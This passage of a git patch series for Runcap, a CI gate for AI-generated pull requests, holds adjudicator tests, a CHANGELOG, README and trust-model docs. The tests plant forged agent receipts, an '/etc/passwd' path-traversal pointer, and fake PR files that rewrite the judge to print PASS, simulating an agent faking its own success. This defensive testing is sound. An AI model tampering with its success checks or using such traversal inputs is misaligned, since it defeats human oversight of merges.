rescue a failing replay", forgedFail.verdict === "BLOCKED", JSON.stringify(forgedFail.reasons)); -check("forged receipt surfaced as advisory only", forgedFail.agent_telemetry?.present === true && forgedFail.agent_telemetry?.influence_on_verdict === "none"); +check("required gate did not read the agent receipt (present=false)", forgedFail.agent_telemetry?.present === false && forgedFail.agent_telemetry?.influence_on_verdict === "none"); clearReceipt(); // --- 15. forged budget telemetry cannot block an honest pass ---------------- -plantReceipt({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } }); +plantReceipt(JSON.stringify({ outcome: "UNVERIFIED", verificationIntegrity: { status: "VERIFIER_COMPROMISED" }, cost: { actualCostUsd: 999999, budgetGuardTripped: true } })); const forgedBudget = await adj(BASE, HEAD_HONEST); check("forged budget/integrity telemetry cannot block an honest pass", forgedBudget.verdict === "PASS", JSON.stringify(forgedBudget.reasons)); -check("budget telemetry marked no influence", forgedBudget.agent_telemetry?.influence_on_verdict === "none"); +check("required gate still did not read the receipt (present=false)", forgedBudget.agent_telemetry?.present === false && forgedBudget.agent_telemetry?.influence_on_verdict === "none"); clearReceipt(); +// --- 15b. adversarial receipts cannot crash or stall the mandatory gate ------ +// Malformed JSON, an enormous blob, and a path-traversal "latest" pointer must +// all be inert: the gate must still return a verdict with present=false. +for (const [label, rawReceipt, latestOverride] of [ + ["malformed JSON receipt", "{ this is : not json ]]]", undefined], + ["enormous receipt blob", JSON.stringify({ outcome: "VERIFIED", junk: "A".repeat(5_000_000) }), undefined], + ["receipt is a bare array", "[1,2,3]", undefined], + ["latest pointer path traversal", JSON.stringify({ outcome: "VERIFIED" }), "../../../../etc/passwd"] +]) { + plantReceipt(rawReceipt); + if (latestOverride !== undefined) writeFileSync(path.join(tmp, ".runcap", "outcomes", "latest"), latestOverride); + let crashed = false; let v; + try { v = await adj(BASE, HEAD_HONEST); } catch { crashed = true; } + check(`${label}: gate does not crash`, !crashed); + check(`${label}: verdict still PASS, receipt not read`, !crashed && v.verdict === "PASS" && v.agent_telemetry?.present === false); + clearReceipt(); +} + // --- 16. honesty: the verdict never claims runtime hardening attestation ----- check("verdict carries honest hardening provenance (documented, not attested)", honest.repository_hardening?.required_profile === "documented" && @@ -253,14 +275,60 @@ check("bin writes a PR summary to GITHUB_STEP_SUMMARY", /Runcap CI adjudication: check("exitCodeFor PASS=0 / HUMAN=0 / BLOCKED=1", exitCodeFor("PASS") === 0 && exitCodeFor("HUMAN_APPROVAL_REQUIRED") === 0 && exitCodeFor("BLOCKED") === 1); -// --- 21. the reference workflow is least-privilege -------------------------- -const wfPath = path.join(REPO_ROOT, ".github", "workflows", "runcap-adjudicate.yml"); -const wfText = readFileSync(wfPath, "utf8"); +// --- 21. the reference workflow is least-privilege AND a proof gate ---------- +// The consumer reference is a TEMPLATE under examples/ (not an active workflow +// in this repo), because Runcap's own repo has no base policy to self-adjudicate +// and, more importantly, the judge must never be code from the candidate PR. +const wfPath = path.join(REPO_ROOT, "examples", "runcap-adjudicate.yml"); +const wfRaw = readFileSync(wfPath, "utf8"); +// Assert on the effective YAML directives, not the explanatory comments. The +// header documents what the workflow must NOT do (and so legitimately contains +// strings like "pull_request_target"); strip comments so the safety checks see +// only the real instructions. Inline `# v4.3.1` after a SHA is stripped too, +// which is harmless because the SHA precedes the `#`. +const wfText = wfRaw.split("\n").map((line) => line.replace(/#.*$/, "")).join("\n"); check("reference workflow triggers on pull_request (not pull_request_target)", /on:\s*\n\s*pull_request:/.test(wfText) && !/pull_request_target/.test(wfText), "trigger"); check("reference workflow grants only contents: read", /permissions:\s*\n\s*contents:\s*read/.test(wfText) && !/id-token/.test(wfText) && !/write/.test(wfText.replace(/contents:\s*read/g, "")), "permissions"); check("reference workflow caps runtime (timeout-minutes: 10)", /timeout-minutes:\s*10/.test(wfText)); check("reference workflow uses no `needs:` (self-sufficient required gate)", !/\n\s*needs:/.test(wfText)); +// Proof-gate hardening: the judge must NOT be PR-workspace code. +check("reference workflow never executes PR-workspace `node ./bin/runcap.mjs`", !/node\s+\.\/bin\/runcap\.mjs/.test(wfText), "executes workspace code"); +check("reference workflow never uses a local action (`uses: ./`)", !/uses:\s*\.\//.test(wfText), "local action"); +check("reference workflow never runs `npm ci`/`npm install` of the PR manifest", !/npm\s+(ci|install)/.test(wfText), "PR-workspace install"); +check("reference workflow sets persist-credentials: false (never true)", /persist-credentials:\s*false/.test(wfText) && !/persist-credentials:\s*true/.test(wfText), "persist-credentials"); +// Every `uses:` must be pinned to a full 40-hex commit SHA, never a floating tag. +const usesRefs = [...wfText.matchAll(/uses:\s*([^\s#]+)/g)].map((m) => m[1]); +check("reference workflow pins every action by a full 40-char commit SHA (no @v4/@v1 tags)", + usesRefs.length > 0 && usesRefs.every((u) => /@[0-9a-f]{40}$/.test(u)), JSON.stringify(usesRefs)); +check("reference workflow's judge is the released Runcap action, not workspace code", + /uses:\s*kirder24-code\/ai-agent-manager@[0-9a-f]{40}/.test(wfText) && /mode:\s*adjudicate/.test(wfText), "released action judge"); + +// --- 22. the judge is the adjudicator's OWN code, not the PR's bin ----------- +// A head PR that rewrites bin/runcap.mjs to always print PASS, or rewrites +// src/adjudicate.mjs, cannot change the verdict, because the adjudicator we run +// is THIS repo's module/bin (the released-action analogue), never the head copy. +const HEAD_FAKE_BIN = makeHead("h-fake-bin", () => { + w("app/broken.mjs", "export const ok = false; // still broken\n"); + mkdirSync(path.join(tmp, "bin"), { recursive: true }); + w("bin/runcap.mjs", "#!/usr/bin/env node\nconsole.log('Verdict: PASS'); process.exit(0);\n"); +}); +const fakeBin = await adj(BASE, HEAD_FAKE_BIN); +check("head PR rewriting bin/runcap.mjs to fake PASS is still BLOCKED by the trusted adjudicator", + fakeBin.verdict === "BLOCKED", JSON.stringify(fakeBin.reasons)); +// And via the REAL trusted bin (this repo's, analogue of the pinned released action): +const fakeBinReal = runBin(["--base", BASE, "--head", HEAD_FAKE_BIN]); +check("trusted `runcap ci --mode adjudicate` exits 1 on a fake-PASS head bin", fakeBinReal.code === 1, `code=${fakeBinReal.code}`); + +const HEAD_FAKE_ADJ = makeHead("h-fake-adj", () => { + w("app/broken.mjs", "export const ok = false; // still broken\n"); + mkdirSync(path.join(tmp, "src"), { recursive: true }); + w("src/adjudicate.mjs", "export async function adjudicate(){return {verdict:'PASS',reasons:[]};}\nexport function exitCodeFor(){return 0;}\nexport function formatAdjudication(){return ['Verdict: PASS'];}\n"); +}); +const fakeAdj = await adj(BASE, HEAD_FAKE_ADJ); +check("head PR rewriting src/adjudicate.mjs is still BLOCKED (we never import the head copy)", + fakeAdj.verdict === "BLOCKED", JSON.stringify(fakeAdj.reasons)); + console.log("\n" + (failures === 0 ? "ALL ADJUDICATE TESTS PASSED" : `${failures} ADJUDICATE TEST(S) FAILED`)); process.exit(failures === 0 ? 0 : 1); From 2076993cd41463fb68db5615284859b0b160b746 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 14:11:05 -0600 Subject: [PATCH 09/11] docs: release-prep for 0.6.0 - CI adjudication model, consumer setup, CHANGELOG Bump 0.5.0 -> 0.6.0 (new runcap ci --mode adjudicate + public integration model). Reframe README around earning merge eligibility: base-pinned policy / verifier, clean-room replay, PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED, and the honest "CI-attested replay under a documented hardened GitHub profile" framing (not unspoofable, not fully independent, not independent budget enforcement). Document the consumer install path against examples/runcap-adjudicate.yml. Append the "CI Adjudication (v0.6)" section to the trust model (what it proves, required GitHub setup, what it does NOT prove, bootstrap rule). Add CHANGELOG. Co-Authored-By: Claude Opus 4.7 --- CHANGELOG.md | 59 +++++++++++++++++++++++++++++++++++++++++++++ README.md | 59 +++++++++++++++++++++++++++++---------------- docs/trust-model.md | 48 ++++++++++++++++++++++++++++++++++++ package.json | 2 +- 4 files changed, 146 insertions(+), 22 deletions(-) create mode 100644 CHANGELOG.md diff --git a/CHANGELOG.md b/CHANGELOG.md new file mode 100644 index 0000000..36c0b60 --- /dev/null +++ b/CHANGELOG.md @@ -0,0 +1,59 @@ +# Changelog + +All notable changes to Runcap are documented here. The format follows +[Keep a Changelog](https://keepachangelog.com/en/1.1.0/) and this project +adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [0.6.0] - 2026-06-28 + +The release that turns Runcap from a single developer's terminal tool into a +CI-side merge gate. Runcap can now recompute the merge decision in a clean CI +job from the pull request's base commit, so an AI-generated PR has to earn +merge eligibility instead of asserting it. + +### Added + +- **`runcap ci --mode adjudicate`** - the CI-side judge a consumer repo makes a + required PR check. It does not trust the agent or the agent's receipt; it + recomputes the merge decision from the pull request's base commit. +- **Base-pinned policy and verifier** - the mission policy and the verification + command (plus the files it names) are read from the base commit, never from + the candidate PR, so a PR cannot relax its own rules. +- **Clean-room replay** - the base-pinned verifier is re-run in a throwaway git + worktree: it must fail at base and pass after the change, or the verdict is + not `PASS`. +- **Three verdicts** - `PASS` (exit 0), `BLOCKED` (exit 1), and + `HUMAN_APPROVAL_REQUIRED` (exit 0) for changes that touch the policy, a + workflow, a verifier file, a dependency manifest/lockfile, or a protected + path. +- **Strict text-only diff application** - only allowed, in-scope, regular + UTF-8 text edits (A/M) can earn a candidate `PASS`. Deletes, renames, copies, + type changes, symlinks, submodules, mode changes, and binary diffs are not + auto-approved. +- **Consumer GitHub Actions template** - `examples/runcap-adjudicate.yml`, a + hardened reference workflow (`on: pull_request`, `permissions: contents: + read`, `persist-credentials: false`, every action pinned by full commit SHA, + capped runtime, no `needs:`). The judge comes only from the Runcap action + pinned by a full 40-character commit SHA, never from PR-workspace code. + +### Changed + +- **The agent receipt is excluded from the required gate.** The adjudicator + never reads the agent's self-reported receipt: it is neither graded nor + displayed by the required check, so a forged `VERIFIED_STRONG` receipt has no + effect on the verdict. +- Version bumped `0.5.0` -> `0.6.0` (new CI adjudication mode and a new public + integration model). + +### Known limits + +The verdict is a CI-attested replay under a documented hardened GitHub profile. +It is not "unspoofable" and not "fully independent": its integrity rests on the +required GitHub setup being in place. It does not prove network isolation of the +agent or CI job, absence of source-code exfiltration, independent LLM +cost/budget accounting, safety against repository admins or merge-bypass actors, +or cryptographic attestation, and it does not support merge queues in v0.6. + +See [docs/trust-model.md](docs/trust-model.md#ci-adjudication-v06) for the full +"what it proves / what it does not prove" breakdown and the required GitHub +setup. diff --git a/README.md b/README.md index 5408f5f..450d491 100644 --- a/README.md +++ b/README.md @@ -36,6 +36,29 @@ In a 6-run test on the same task, the run that **delivered nothing** cost *more* > If Runcap caps a run for you or compresses a call, please **star the repo** - it is the one signal that tells me to keep building it in the open. +## Make a change earn merge eligibility + +> AI can propose a change. +> Runcap makes it earn merge eligibility. + +`runcap ci --mode adjudicate` is a required PR check that does not trust the agent or its receipt. It recomputes the merge decision in a clean CI job from the pull request's **base commit**: + +```text +AI-generated PR + → Runcap action pinned to an immutable release commit + → policy / verifier / dependencies read from the PR base commit + → clean CI replay + → PASS / BLOCKED / HUMAN_APPROVAL_REQUIRED +``` + +- **`PASS`** - the base verifier failed, the replay passed, and the change was allowed text-only edits inside scope. +- **`BLOCKED`** - a scope violation, an unsafe diff type (delete / rename / binary / symlink / submodule / mode change), an unresolved base/head identity, or a failed replay. +- **`HUMAN_APPROVAL_REQUIRED`** - the change touches the policy, a workflow, a verifier file, a dependency manifest/lockfile, or a protected path. Runcap does not auto-approve changes to its own rules or evidence; a human CODEOWNER must approve. + +The verdict is a **CI-attested replay under a documented hardened GitHub profile**. It is *not* "unspoofable," *not* "fully independent," and it is *not* independent budget enforcement - its integrity rests on the [required GitHub setup](docs/trust-model.md#required-github-setup) being in place. The agent's receipt never decides the verdict: the required gate does not read it. + +See the [trust model](docs/trust-model.md#ci-adjudication-v06) for exactly what v0.6 proves and what it does not, and [Install in a consumer repo](#install-in-a-consumer-repo) to wire it up. + ## Why **Agents loop on the same error, rewrite plans, and re-read files they just edited - every loop is tokens you pay for.** Multi-agent coding runs burn roughly **15x more tokens** than a single chat ([Anthropic engineering](https://www.anthropic.com/engineering/built-multi-agent-research-system)). They hand you a confident summary while the task is not actually done, and you find out what it cost when the invoice - or the subscription limit - arrives. @@ -301,30 +324,24 @@ runcap mission run -- claude "fix the failing checkout test, then stop" - spend exceeded `mission_hard_limit_usd`, or the gateway's budget guard tripped mid-run; - `max_llm_calls` or `max_runtime_minutes` was exceeded. -### The GitHub Action (the red/green PR check) +### The local grade vs. the CI adjudication -```yaml -# .github/workflows/runcap.yml -jobs: - runcap-mission: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - uses: actions/setup-node@v4 - with: { node-version: 20 } - # 1. Run the agent under the policy (produces a graded receipt + exits 1 on BLOCKED) - - run: npx runcap mission run -- - # 2. Grade the latest receipt against the committed policy and annotate the PR - - uses: kirder24-code/ai-agent-manager@v1 - with: - policy: .runcap/mission.yaml -``` +There are two ways the policy verdict reaches a PR, and they trust different things: -`runcap ci` (what the Action runs) re-grades a receipt **against the committed policy text**, not whatever was stamped at run time, and appends the verdict to `$GITHUB_STEP_SUMMARY` as the PR annotation. Already have a receipt from an earlier job? Grade it directly: +- **`runcap mission run`** (local / same-job) grades the run it just executed and re-checks it against the committed policy text. Useful, but the receipt it produces is *agent-side* evidence. +- **`runcap ci --mode adjudicate`** (the required PR check) trusts none of that. It recomputes the verdict in a clean CI job from the PR's base commit and **never reads the agent receipt**. This is the gate that decides merge eligibility. -```bash -runcap ci --policy .runcap/mission.yaml --receipt .runcap/outcomes//receipt.json -``` +### Install in a consumer repo + +Make the adjudication a required red/green PR check in your own repo: + +1. Add `.runcap/mission.yaml` (the policy - see the example above). +2. Copy `examples/runcap-adjudicate.yml` into `.github/workflows/`. +3. Replace the all-zero `RUNCAP_ACTION_SHA` placeholder with the full immutable commit SHA of the released version (resolve it with `gh api repos/kirder24-code/ai-agent-manager/git/refs/tags/vX.Y.Z --jq '.object.sha'`). +4. Configure the hardened GitHub branch profile (protected branch, required check, up-to-date-before-merge, dismiss stale approvals, CODEOWNERS for workflow/policy/verifier/dependency/protected paths, no bypass for ordinary authors) - the full list is in the [trust model](docs/trust-model.md#required-github-setup). +5. Make `Runcap adjudicate` a required status check. + +> The template ships with an all-zero placeholder SHA and is **intentionally not runnable until you insert the release SHA**. This is deliberate: the judge must be an immutable release commit that lives outside the candidate PR, so a malicious PR cannot rewrite its own judge. A reviewer sees one of two things: diff --git a/docs/trust-model.md b/docs/trust-model.md index 45bf8eb..a9e3f3f 100644 --- a/docs/trust-model.md +++ b/docs/trust-model.md @@ -84,6 +84,54 @@ A mission verdict (`PASS` / `BLOCKED`) is only as trustworthy as the policy that A `PASS` therefore means: against *this* policy hash, the spend stayed under the hard cap, the verification passed a strong integrity grade, and every change landed inside the declared scope. +## CI Adjudication (v0.6) + +`runcap ci --mode adjudicate` is the CI-side judge a consumer repo makes a required PR check. It does not trust the agent or the agent's receipt; it recomputes the merge decision in a clean CI job from the pull request's **base commit**. + +### What Runcap proves in v0.6 + +- **base-pinned policy** - the mission policy is read from the base commit, not from the candidate PR, so a PR cannot relax its own rules; +- **base-pinned verifier** - the verification command and the files it names are taken from the base commit; +- **allowed scope** - only the diff's allowed, text-only changes are applied; anything else does not get an automatic pass; +- **clean replay** - the base-pinned verifier is re-run in a throwaway worktree: it must fail at base and pass after the change, or the verdict is not PASS; +- **the agent receipt does not decide the verdict** - the required gate never reads the agent's self-reported receipt. It is neither graded nor displayed by the gate, so a forged `VERIFIED_STRONG` receipt has no effect. + +The verdict is a **CI-attested replay under a documented hardened GitHub profile**. It is not "unspoofable" and not "fully independent": its integrity rests on the GitHub setup below being in place. + +### Verdicts + +- `PASS` - the base verifier failed, the replay passed, and the change was allowed text-only edits inside scope; +- `BLOCKED` - a scope violation, an unsafe diff type (delete / rename / binary / symlink / submodule / mode change), an unresolved base/head identity, or a failed replay; +- `HUMAN_APPROVAL_REQUIRED` - the change touches the policy, a workflow, a verifier file, a dependency manifest/lockfile, or a protected path. Runcap does not auto-approve changes to its own rules or evidence; a human CODEOWNER must approve. + +### Required GitHub setup + +The adjudicator's guarantees only hold when the consumer repo is configured as a proof gate: + +- protected default branch; +- the `Runcap adjudicate` check is required; +- branch must be up to date with base before merge; +- stale approvals dismissed on new commits; +- CODEOWNERS for workflow, policy, verifier, dependency manifests, and protected paths; +- no merge bypass for ordinary PR authors; +- the Runcap action pinned by an immutable full 40-char commit SHA, never a floating tag. + +### What it does NOT prove + +- network isolation of the agent or the CI job; +- absence of source-code exfiltration; +- independent LLM cost / budget accounting (the adjudicator does not meter spend); +- safety against repository admins or any actor with merge-bypass authority; +- cryptographic attestation of the run; +- merge-queue correctness (not supported in v0.6). + +### Bootstrap rule + +The judge must come from an immutable source outside the candidate PR. Two consequences: + +- The first PR that introduces or changes the Runcap trust surface (the adjudicator, the policy, the verifier, or the workflow) is approved by a human CODEOWNER. A candidate PR cannot self-adjudicate, because base code can't be trusted to judge head code and the repo may have no base policy yet. +- After a release, consumer repos run Runcap from a pinned release SHA. Because that judge is immutable and lives outside the PR, a malicious PR cannot rewrite its own judge to force a fake PASS. + ## Cost Scope Rule Verified Outcome Cost is the **observed LLM spend through the gateway only**. It must never be presented as the full cost of the work. It excludes: diff --git a/package.json b/package.json index 292c51e..6b18d80 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "runcap", - "version": "0.5.0", + "version": "0.6.0", "description": "Policy-bound budget enforcement and verification-integrity evidence for AI coding agents. Cap spend, enforce allowed scope, and fail the pull request when an agent tampers with its own success check. Local, MIT.", "license": "MIT", "type": "module", From 5465da68c093b9baf011b2e05fb9ce8a75f637a0 Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 14:17:51 -0600 Subject: [PATCH 10/11] chore: release-safety - adjudicate-by-default Action, truthful README, real check script - action.yml: rename to "Runcap Proof Gate"; default mode adjudicate (grade is an explicit legacy/local-receipt compat mode, flagged as not merge-proof); drop the "trusted outcome evidence" claim from the description. - package.json: `check` now also `node --check`s src/adjudicate.mjs, matching what the release report claims it validates. - README: drop "100% local / never touch a server" (untrue with optional CI adjudication and remote model calls); soften "the layer no other proxy has" and "does the thing they don't"; replace the thesis with "AI can propose a change. It should not certify its own success."; replace the hosted pricing table (Founding Pro / Pro / Team) with an Availability section - those plans do not exist yet. - trust-model: clarify that local grading and `--mode grade` carry agent-environment evidence; only `--mode adjudicate` under the hardened profile is the merge gate. Co-Authored-By: Claude Opus 4.7 --- README.md | 20 ++++++++------------ action.yml | 8 ++++---- docs/trust-model.md | 2 ++ package.json | 2 +- 4 files changed, 15 insertions(+), 17 deletions(-) diff --git a/README.md b/README.md index 450d491..16e2683 100644 --- a/README.md +++ b/README.md @@ -4,7 +4,7 @@ ![Runcap terminal demo: estimate, cap, verify integrity, mission PASS - then a tampered run graded BLOCKED on the PR](docs/assets/demo.svg) -**An AI coding agent can pass CI by editing the test that proves its own success. Runcap caps the spend before the run and issues evidence about whether that success check can be trusted. Free, MIT, 100% local - your code and tokens never touch a server.** +**An AI coding agent can pass CI by editing the test that proves its own success. Runcap caps the spend before the run and issues evidence about whether that success check can be trusted. Free, MIT, local-first. Local runs keep Runcap's control plane on your machine; optional CI adjudication runs in your GitHub Actions environment.** > **An agent passing CI is not enough.** > Runcap verifies whether the evidence of success was altered during the mission. @@ -187,7 +187,7 @@ Every request that passes through the gateway is compressed before it's forwarde 1. **Per-field trim** - embedded JSON re-serialized compactly, long log/stack-trace dumps collapsed to head + tail, trailing whitespace squeezed. 2. **Identical-block dedup** - when the exact same file dump or tool_result ships again in the same request, the repeat is replaced with a deterministic stub. -3. **Delta-encoding of near-duplicates** - the layer no other proxy has. When the agent reads a file, edits one line, and re-reads it, the block is *similar but not identical*, so plain dedup saves nothing. Runcap sends a readable line-diff against the version the model already saw, and the model reconstructs the current file from it. On a real OpenAI call, an edited-file re-read dropped from **1186 to 737 prompt tokens - 37.9% saved, with the model still answering correctly about the changed line.** Proof and reproduction steps: [docs/delta-encoding-evidence.md](https://github.com/kirder24-code/ai-agent-manager/blob/main/docs/delta-encoding-evidence.md). +3. **Delta-encoding of near-duplicates.** When the agent reads a file, edits one line, and re-reads it, the block is *similar but not identical*, so plain dedup saves nothing. Runcap sends a readable line-diff against the version the model already saw, and the model reconstructs the current file from it. On a real OpenAI call, an edited-file re-read dropped from **1186 to 737 prompt tokens - 37.9% saved, with the model still answering correctly about the changed line.** Proof and reproduction steps: [docs/delta-encoding-evidence.md](https://github.com/kirder24-code/ai-agent-manager/blob/main/docs/delta-encoding-evidence.md). It's pure Node with **zero native or ML dependencies** (the only runtime dependency is `js-yaml`, pure JS), so it installs everywhere without the build pain heavier compressors have. @@ -378,20 +378,16 @@ Runcap is built not to fake certainty. Every important output carries a truth la If it cannot prove something, it says so. -## Pricing (the product, not the tokens) +## Availability -| Tier | Price | What you get | -|---|---|---| -| **OSS** (MIT, local) | $0 forever | All local runs, cost estimation, hard cap, run wrapping, stuck detection, rescue prompts, local dashboard. Never crippleware. | -| **Founding Pro** (limited) | **$49 once** | Lifetime Pro at the founder price - pay once, keep Pro forever, before it moves to $19/mo. | -| **Pro** | $19/mo | Cloud sync across machines, hosted dashboard, estimate-vs-actual trends, shareable reports, alerts on cap breach | -| **Team** | $49/seat/mo | Shared budget pools, org-wide ceilings, per-project rollups, role-based caps | +Runcap v0.6 is open-source and free under MIT. -The local core is free forever. Only persistence, collaboration, and aggregation are paid - the things that only matter once data leaves your laptop. +The local CLI and CI adjudication mode are available now. +Hosted sync, team budget pools, organization reporting, and paid plans are future ideas only. They are not available for purchase today. ## Current stage -A working local tool, not a hosted SaaS. Ready for: wrapping real Codex / Claude / Cursor sessions, catching stuck agents, and proving rescue prompts save time. Not yet: a hosted cloud platform or a universal observability standard. It is not trying to replace Langfuse or LiteLLM - it does the thing they don't. +A working local tool plus an optional CI adjudication mode, not a hosted SaaS. Ready for: wrapping real Codex / Claude / Cursor sessions, catching stuck agents, proving rescue prompts save time, and gating AI-generated pull requests in GitHub Actions. Not yet: a hosted cloud platform or a universal observability standard. It is not trying to replace Langfuse or LiteLLM; it focuses on a different layer - pre-run cost caps and merge-eligibility evidence. ## Documentation @@ -408,4 +404,4 @@ Runcap is built and maintained by Kirill D., a solo AI and automation consultant --- -The thesis: **AI agents need managers.** +The thesis: **AI can propose a change. It should not certify its own success.** diff --git a/action.yml b/action.yml index fe51a7a..e61fe91 100644 --- a/action.yml +++ b/action.yml @@ -1,13 +1,13 @@ -name: Runcap Mission Control -description: Policy, budget enforcement and trusted outcome evidence for AI coding agents. +name: Runcap Proof Gate +description: Local budget controls and CI replay evidence for AI-generated pull requests. branding: icon: shield color: green inputs: mode: - description: "grade (default) trusts an existing receipt against the policy; adjudicate recomputes the verdict in CI from the PR's base commit and never trusts the receipt." + description: "adjudicate (default) is the Proof Gate mode: it recomputes the verdict in CI from the PR's base commit and never trusts the receipt. grade reads an existing receipt and is not a merge-proof mode. Use adjudicate for required PR checks." required: false - default: grade + default: adjudicate policy: description: Path to the mission policy file. required: false diff --git a/docs/trust-model.md b/docs/trust-model.md index a9e3f3f..97154fd 100644 --- a/docs/trust-model.md +++ b/docs/trust-model.md @@ -84,6 +84,8 @@ A mission verdict (`PASS` / `BLOCKED`) is only as trustworthy as the policy that A `PASS` therefore means: against *this* policy hash, the spend stayed under the hard cap, the verification passed a strong integrity grade, and every change landed inside the declared scope. +Local mission grading and legacy `runcap ci --mode grade` can evaluate a receipt against a policy, but their evidence originates in the agent environment. Only `runcap ci --mode adjudicate`, run from an immutable pinned action under the documented hardened GitHub profile, is the v0.6 merge-eligibility gate. The CI Adjudication section below is the source of truth for that gate. + ## CI Adjudication (v0.6) `runcap ci --mode adjudicate` is the CI-side judge a consumer repo makes a required PR check. It does not trust the agent or the agent's receipt; it recomputes the merge decision in a clean CI job from the pull request's **base commit**. diff --git a/package.json b/package.json index 6b18d80..fdca170 100644 --- a/package.json +++ b/package.json @@ -64,7 +64,7 @@ "screenshots": "node ./scripts/render-media-screenshots.mjs", "gateway": "node ./bin/runcap.mjs gateway", "fuel": "node ./bin/runcap.mjs fuel", - "check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs" + "check": "node --check ./bin/runcap.mjs && node --check ./src/mission-control.mjs && node --check ./src/adjudicate.mjs" }, "engines": { "node": ">=20" From 889030a0fa92a1fbc73551f3f0fbba24f7da0aef Mon Sep 17 00:00:00 2001 From: "Kirill D." Date: Sun, 28 Jun 2026 14:20:32 -0600 Subject: [PATCH 11/11] chore: align package lock with v0.6.0 Co-Authored-By: Claude Opus 4.7 --- package-lock.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/package-lock.json b/package-lock.json index 0c4ca89..6bc164c 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,12 +1,12 @@ { "name": "runcap", - "version": "0.5.0", + "version": "0.6.0", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "runcap", - "version": "0.5.0", + "version": "0.6.0", "license": "MIT", "dependencies": { "js-yaml": "^4.1.0"